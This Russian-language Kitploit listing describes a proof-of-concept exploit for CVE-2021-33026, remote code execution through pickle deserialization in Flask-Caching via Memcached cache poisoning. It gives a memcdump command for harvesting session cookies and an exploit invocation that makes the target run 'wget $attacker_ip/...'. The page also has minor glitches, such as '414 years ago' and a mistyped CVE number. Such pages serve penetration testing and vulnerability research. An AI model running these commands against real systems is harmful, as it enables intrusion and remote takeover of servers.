Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/carlosg13/cve-2021-33026
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHubcarlosg13/cve-2021-33026

CVE-2021-33026

Удаленное выполнение кода через сериализацию Pickle - Отравление Memcached

Репозиторий
414 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-33026

Удаленное выполнение кода через сериализацию Pickle — PoC-эксплойт отравления Memcached

Что такое CVE-2021-3306?

Расширение Flask-Caching версии до 1.10.1 для Flask использует Pickle для сериализации, что может привести к удаленному выполнению кода или локальному повышению привилегий. Если злоумышленник получает доступ к хранилищу кеша (например, файловая система, Memcached, Redis и т.д.), он может создать специально сформированную полезную нагрузку, отравить кеш и выполнить Python-код.

Какова функция библиотеки Pickle?

Pickle в Python в основном используется для сериализации и десериализации структуры Python-объекта. Другими словами, это процесс преобразования Python-объекта в поток байтов для сохранения в файле/базе данных, поддержания состояния программы между сеансами или передачи данных по сети.

Что такое Memcached?

Memcached — это распределенная система кеширования в оперативной памяти общего назначения. Она часто используется для ускорения динамических веб-сайтов на основе баз данных путем кеширования данных и объектов в ОЗУ, чтобы уменьшить количество обращений к внешнему источнику данных.

[!] Эксплуатация:

1. Чтобы эксплойт сработал, необходимо предоставить сессионный cookie. Почему? В этой концепции мы имеем случай, когда сессионный cookie уязвимого Flask-приложения управляется или хранится сервисом Memcached:

root@kitploit:~
memcdump --servers=target_machine_ip_address

imagen

2. Использование эксплойта:

-h --> меню справки

--cmd --> Команда для выполнения на целевой машине

--rhost --> IP-адрес целевой машины

--rport --> Порт целевой машины

--cookie --> Ваш ФАКТИЧЕСКИЙ СЕССИОННЫЙ COOKIE из УЯЗВИМОГО FLASK-ПРИЛОЖЕНИЯ. Пример: session:58e61600-9ecf-45b8-b7b8-db2f0a00f421

3. Запуск эксплойта:

root@kitploit:~
python3 cve-2021-33026_PoC.py --rhost $target_machine_ip_address --rport $target_machine_port --cmd "wget $attacker_ip/picke_memcached_posisoning_exploit" --cookie "session:58e61600-9ecf-45b8-b7b8-db2f0a00f421"

imagen imagen

Ссылки:

https://nvd.nist.gov/vuln/detail/CVE-2021-33026

https://github.com/pallets-eco/flask-caching/pull/209

https://www.synopsys.com/blogs/software-security/python-pickling/

Скачать инструмент